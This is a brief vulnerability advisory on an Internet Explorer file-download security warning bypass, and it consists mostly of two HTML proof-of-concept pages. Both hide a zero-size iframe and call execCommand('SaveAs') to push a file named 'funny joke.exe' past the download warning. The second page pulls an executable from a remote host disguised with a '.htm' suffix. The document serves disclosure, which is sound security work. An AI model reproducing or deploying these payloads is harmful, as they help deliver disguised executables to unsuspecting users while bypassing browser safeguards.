Microsoft Internet Explorer File Download Security Warning Bypass Vulnerability

Microsoft Internet Explorer File Download Security Warning Bypass Vulnerability

The following proof of concept is available:

<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
</body>
</html>

<html>
<body>
<iframe src='http://example.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>